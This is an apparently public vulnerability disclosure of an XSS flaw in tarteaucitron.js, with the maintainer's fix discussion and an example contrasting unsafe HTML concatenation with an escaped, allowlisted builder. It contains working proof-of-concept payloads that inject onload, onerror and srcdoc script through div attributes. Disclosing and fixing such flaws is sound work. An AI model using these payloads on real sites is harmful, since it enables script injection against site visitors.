youtube service is vulnerable to XSS vulnerability in amauric/tarteaucitron.js


Reported on Jul 2nd 2023


If an attacker is able to insert a div with attributes on a page where the youtube service is enabled, they can craft a width attribute that would allow them to execute arbitrary JS on the page.

(Other attributes like theme or controls are also vulnerable to this.)

Proof of Concept

    <!DOCTYPE html>
    <html lang="en">
    <title>TAC XSS</title>
    <script src="tarteaucitron.js"></script>
    <script>
        (tarteaucitron.job = tarteaucitron.job || []).push('youtube');
        tarteaucitron.init({ readmoreLink: '/foo', orientation: 'bottom' });
    </script>
    <div class="youtube_player" videoID="vo-SxWZ7tyM" width='" onload="alert(`xss`);"'></div>
    </html>

The srcdoc attribute can also be used for this (and should probably not be allowed):

    <div class="youtube_player" videoID="vo-SxWZ7tyM" srcdoc='<script>alert(`xss`)</script>'></div>


Imagine a website where users can post comments containing limited HTML (but not <script> tags). This vulnerability would allow an attacker to bypass this restriction and inject JS in the page.

Pierre Rudloff
3 months ago


Services that build <img> tags are also vulnerable. For example, the kwanko service:

    <div class="tac_kwanko" data-mclic='" onerror="alert(`xss`);"'></div>
2 months ago



Thanks for your report :)

The attributes are already retrieved by a custom function. If I filter the result with this function, it should be enough?


Pierre Rudloff
2 months ago


The best practice here would be to stop building HTML with concatenation and instead use DOM methods like createElement() and setAttribute(). However, this would require rewriting a lot of services code.

I guess calling fixSelfXSS() in getElemAttr() could be a quicker fix.
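The two approaches discussed in this thread (filtering attribute values before concatenation, versus not copying arbitrary attributes at all), shown as an added example that is not tarteaucitron's own code. The embed URL, the allowlist and escapeAttr() are assumptions; the three div inputs are constructed from the values in the report.

```javascript
// Stand-in for a service that builds an <iframe> by concatenating attributes
// read from a <div class="youtube_player">, beside a hardened builder.
const EMBED = 'https://www.youtube-nocookie.com/embed/';   // assumed embed base
const benignDiv = { videoID: 'vo-SxWZ7tyM', width: '560' };
const widthXss  = { videoID: 'vo-SxWZ7tyM', width: '" onload="alert(`xss`);"' };
const srcdocXss = { videoID: 'vo-SxWZ7tyM', srcdoc: '<script>alert(`xss`)</script>' };

// Vulnerable pattern: every div attribute is copied verbatim into the markup,
// so a value containing a double quote closes the attribute and adds new ones.
function buildIframeUnsafe(attrs) {
  let html = '<iframe src="' + EMBED + attrs.videoID + '"';
  for (const name of Object.keys(attrs)) {
    if (name !== 'videoID') html += ' ' + name + '="' + attrs[name] + '"';
  }
  return html + '></iframe>';
}

// Hardened pattern (assumed, not the upstream fix): only allowlisted attribute
// names are copied (srcdoc and on* handlers never are) and every value is
// escaped so it cannot terminate the quoted attribute. This is what a filter
// in getElemAttr() achieves; createElement()/setAttribute() avoids the
// string building altogether.
const ALLOWED = new Set(['width', 'height', 'theme', 'controls']);
function escapeAttr(value) {
  return String(value).replace(/&/g, '&amp;').replace(/"/g, '&quot;')
                      .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function buildIframeSafe(attrs) {
  let html = '<iframe src="' + EMBED + escapeAttr(attrs.videoID) + '"';
  for (const name of Object.keys(attrs)) {
    if (ALLOWED.has(name)) html += ' ' + name + '="' + escapeAttr(attrs[name]) + '"';
  }
  return html + '></iframe>';
}

// Check helper: tokenise the start tag roughly the way a browser does
// (double-quoted values may contain '>' but not '"') and return the attribute
// names the element ends up with. An 'onload' or 'srcdoc' in the result means
// the attacker-controlled value escaped its attribute.
function attributeNames(tagHtml) {
  const names = [];
  const re = /\s+([^\s"'=<>\/]+)(?:="([^"]*)")?/y;
  re.lastIndex = tagHtml.match(/^<[A-Za-z]+/)[0].length;
  let m;
  while ((m = re.exec(tagHtml)) !== null) names.push(m[1]);
  return names;
}
```

For the crafted width value the unsafe builder yields an element with src, width and onload attributes, while the safe builder yields only src and width; the srcdoc input is dropped entirely by the allowlist.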

Amauri CHAMPEAUX validated this vulnerability 2 months ago

Thanks, I've applied this quick fix and noted to review the code to create HTML with the DOM functions.

Pierre Rudloff has been awarded the disclosure bounty
Amauri CHAMPEAUX marked this as fixed in v1.13.1 with commit c4c2fc 2 months ago
This vulnerability has been assigned a CVE
Amauri CHAMPEAUX published this vulnerability 2 months ago